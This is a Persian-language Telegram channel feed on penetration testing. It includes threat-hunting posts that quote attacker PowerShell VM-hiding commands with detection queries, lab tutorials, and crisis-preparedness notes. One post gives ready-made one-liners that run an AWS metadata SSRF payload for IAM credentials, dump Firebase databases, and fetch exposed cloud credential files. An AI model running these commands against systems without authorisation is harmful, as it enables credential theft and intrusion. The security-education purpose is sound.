Try Hack Box
6.16K subscribers
696 photos
65 videos
129 files
709 links
1 Nov 2020
1399/08/11
آموزش تست نفوذ و ردتیم

https://linkedin.com/company/tryhackbox-org/

یوتیوب
https://youtube.com/@tryhackbox

کانال ها :
@TryHackBoxOfficial ( نقشه راه )
@TryHackBoxStory ( اخبار و داستانهای هک )
پشتیبانی : @ThbxSupport
Download Telegram
🤖 XBOW
🔖 — شماره ۱ جهان در H1


برای اولین بار، شکارچی باگ هوش مصنوعی خودران به صدر جدول جهانی رسید! و در حالی که تو هنوز به گذاشتن گیومه ادامه می‌دهی، باید بگویم که این نه گذشته است و نه آینده، بلکه اکنون است!

نظرتون راجب این چیه؟


گروه جهت مشارکت در این گفتگو :

https://t.me/+XPV3S0tygl1lZGE0


#باگ_بانتی
@TryHackBox | @TryHackBoxOfficial
🤔3🔥1
🔖 استفاده از ماشین‌های مجازی برای بایپس کردن ابزارهای امنیتی روز به روز محبوب‌ تر می‌شود. امروز به یک نمونه دیگر از پیاده‌سازی زیرتکنیک Hide Artifacts: Run Virtual Instance (T1564.006) نگاهی خواهیم انداخت.

بر اساس گزارش، مهاجم قابلیت Hyper-V را بر روی یک ماشین ویندوزی که به خطر افتاده بود، فعال کرد و سپس یک ماشین مجازی مبتنی بر Alpine Linux که حاوی بدافزار بود، دانلود و وارد کرد.

پس از دانلود، ماشین مجازی با استفاده از PowerShell وارد شد:
"cmd.exe" /C powershell.exe -c import-vm -path "c:\\programdata\\microsoft\\AppV\\app\\Virtual Machines\\1DBCC80B-5803-4AF1-8772-712C688F408A.vmcx" -Copy -GenerateNewId > c:\\Programdata\\WindowsUpdateTask_t.tmp 2>&1

همچنین از PowerShell برای راه‌اندازی ماشین مجازی تازه وارد شده استفاده شد:

"cmd.exe" /C powershell.exe -c Start-VM -name WSL > c:\\Programdata\\WindowsUpdateTask_R.tmp 2>&1

به عنوان مثال، می‌توان به دنبال دستورات مربوط به مدیریت ماشین‌ های مجازی گشت:

event_type: "processcreatewin"

AND

proc_file_path: "powershell.exe"

AND

cmdline: ("import-vm" OR "start-vm")

آیا تا به حال با تکنیک‌ های مشابه ای مواجه شده‌اید؟ نظرات و تجربیات خود را به اشتراک بگذارید!


🕊 @TryHackBox | @TryHackBoxOfficial
#امنیت_سایبری
5👍3
🔖 مهاجمان همچنان به آزمایش با پلتفرم‌ های مختلف مدیریت از راه دور ادامه می‌ دهند، بنابراین امروز یک مثال دیگر از ابزارهای دسترسی از راه دور را بررسی می‌کنیم: نرم‌افزار Desktop Remote (T1219.002).

به مورد UNK_SmudgedSerpent نگاه می‌کنیم. مهاجم از ایمیل‌ های فیشینگ برای سرقت اطلاعات حساب کاربری و همچنین برای ارسال آرشیوهایی با فایل‌ های MSI استفاده کرده است که RMM را بارگذاری می‌کنند.

در اکثر موارد، مهاجمان از PDQConnect نرم‌افزار نظارت و مدیریت از راه دور استفاده کرده‌اند.

اگر شما از این نرم‌افزار در زیرساخت خود استفاده نمی‌کنید، این می‌ تواند تارگت خوبی برای شکار باشد:

event_type: "processcreatewin"

AND

proc_file_productname: "PDQConnectAgent"

همچنین می‌توانید به دنبال دامنه‌های مرتبط بگردید:

event_type: "dnsreqwin"

AND

dns_rname: "app.pdq.com"

نظرات خود را با ما به اشتراک بگذارید



🕊 @TryHackBox | 🥀 @TryHackBoxOfficial
#امنیت_سایبری
👍32🕊1
🔖 مینی دوره #رایگان نصب و راه‌اندازی لابراتورهای تست نفوذ وب قسمت اول : DVWA، Juice Shop و VulnerableApp

توی این ویدئو نحوه نصب راحت و آسان سه تا لابراتوار فوق العاده برای تمرین گفتیم

1 - dvwa : https://github.com/sagikazarmark/docker-dvwa
2 - juice shop : https://github.com/juice-shop/juice-shop
3 - VunlableApp : https://github.com/SasanLabs/VulnerableApp


🔗از لینک هایی که گذاشتیم میتونید برید و سر بزنید به اصل داکیومنت ها و بخونید

⚠️توصیه مهم ای که هست حتما سرویس ها رو بعد از استفاده خاموش کنید

"دست هاتون رو آلوده کنید و شروع کنید به تمرین تمرین تمرین"

🔗 https://youtu.be/G6jdNx5JHv4

انتقادی داشتید حتما اطلاع بدید، تا بتونیم آموزش با کیفیت‌تری ارائه بدیم،امیدواریم از آموزش لذت ببرید.


ما رو در شبکه های زیر دنبال داشته باشید :
🥀 @TryHackBox | @TryHackBoxOfficial

Linkedin | YouTube | GitHub | Insta
#HomeLab #WebPentest #dvwa #docker
👍82
Forwarded from 
AD Enumeration w SC - @TryHackBox.pdf
755.8 KB
🔖 در عملیات تیم قرمز، اغلب با پیاده‌سازی‌ های داخلی VDI روبرو می‌شویم که دسترسی به اینترنت و شبکه خارجی ندارند، و به همین دلیل نمی‌توانیم اسکریپت‌ های PowerShell خود را برای شمارش AD و کاربران آن در سیستم ‌های آسیب‌دیده دانلود کنیم.

در بیشتر دوره ‌های تیم قرمز، دانشجویان را تشویق می ‌کنند تا از اسکریپت‌ های PowerShell آماده برای شمارش محیط AD استفاده کنند، مانند  powerview.ps1، که روشی بسیار مناسب و غیرپیچیده است. اما اگر این روش مناسب برای ما نامناسب شود و اجازه دانلود اسکریپت‌های PowerShell یا هر ابزار دیگری از اینترنت در سیستم آسیب‌دیده را نداشته باشیم، چه باید کرد؟
اسکریپت‌هایی مانند Powerview.ps1 از توابع برای ساده‌سازی کارها استفاده می‌کنند. اما برخی از دستورات تک‌ خطی وجود دارند که می ‌توانند همان کار را در صورت عدم دسترسی به powerview انجام دهند.

در این آموزش، به بررسی این دستورات تک ‌خطی می‌پردازیم که می‌توانند به ما در شمارش AD کمک کنند.

توییتر بنده :
https://www.x.com/kavehxnet

🥀🕊🖤
@KavehOffSec
#ردتیم
1👏31🔥1
Cloud Security One Liners

AWS S3 Bucket Finder
cat urls.txt | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com" | anew s3_buckets.txt
cat urls.txt | grep -oE "s3://[a-zA-Z0-9.-]+" | anew s3_buckets.txt


• S3 Permission Check
cat s3_buckets.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request 2>/dev/null && echo "OPEN: @"'


• Firebase Database
cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.firebaseio\.com" | xargs -I@ curl -s @/.json | grep -v "null"


• Azure Blob Storage
cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.blob\.core\.windows\.net" | anew azure_blobs.txt


• GCP Storage
cat urls.txt | grep -oE "storage\.googleapis\.com/[a-zA-Z0-9-]+" | anew gcp_buckets.txt


• AWS Metadata SSRF
cat urls.txt | gf ssrf | qsreplace "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | httpx -silent -ms "AccessKeyId"


• Cloud Credential Files
cat alive.txt | httpx -silent -path /.aws/credentials,/.docker/config.json,/kubeconfig -mc 200 | anew cloud_creds.txt

@TryHackBox | @TryHackBoxOfficial
#باگ_بانتی #کلاد 🕊🥀
2
در این شرایط بحرانی، حفظ امنیت و سلامت خود و خانواده ‌تان از اهمیت ویژه ‌ای برخوردار است. لطفاً به دقت مراقب یکدیگر باشید و اقلام ضروری را تهیه کنید.

• ذخیره مواد غذایی خشک و غیرپرمصرف: حداقل یک هفته.
• آب آشامیدنی: سازمان ‌های امدادی معمولاً 2–3 لیتر به ازای هر نفر در روز پیشنهاد می‌کنند (برای 3 روز = 6–9 لیتر برای هر نفر). بهتر است مطابق دستورالعمل ‌های رسمی محاسبه کنید.
• سوخت: کافی برای 200–300 کیلومتر سفر یا بر اساس نیاز محلی؛ باک، بررسی وضعیت خودرو و حمل ابزار لازم.
• آمادگی برای قطع برق: چراغ قوه، باتری اضافی، پاوربانک، شارژر خورشیدی یا ژنراتور کوچک در صورت امکان.
• ارتباط آفلاین: نصب اپلیکیشن ‌های معتبر برای پیام ‌رسانی بدون اینترنت (قبل از بحران، قابلیت‌ها و امنیتشان را بررسی کنید).
• همبستگی محله‌ای: کمک به سالمندان، جمع‌‌آوری داروهای ضروری، ذخیره دارایی نقدی کوچکی (پول نقد) و برنامه ‌ریزی تماس ‌های اضطراری.

مواظب خود و خانواده خود باشید
👍6👎1
📣 ارسال لینک و فایل داخل گروه برای شرایط فعلی آزاد شد رفقا.
می تونید با هم ارتباط بگیرید و لینک و فایل کانفینگ و... تبادل کنید.
برای همتون آرزوی سلامتی دارم. به امید روزی که حال دل و.... هممون بهتر از گذشته باشه

t.me/TryHackBoxGroup 🔗
4
سایت Lets encrypt داخل مرورگر باز میشه، اما امکان تمدید ssl با certbot همچنان مقدور نیست و ارور connection برمی‌گردونه
👍1
کانفیگ های قدیمی که خریداری کردید رو اینترنت ایرانسل تست کنید به نظر میاد یه سریاشون پینگ میدن و کار می کنن.

مشخص نیست اختلال هست یا مرحله مرحله قراره حالت عادی برگردیم


آپدیت: اختلال بود و رفع شده
👍4👎1
گیت هاب در دسترس قرار گرفته

اما امکان دانلود Release پروژه ها بدون VPN ندارید.
🤔4🐳4🌚3👨‍💻3🎃1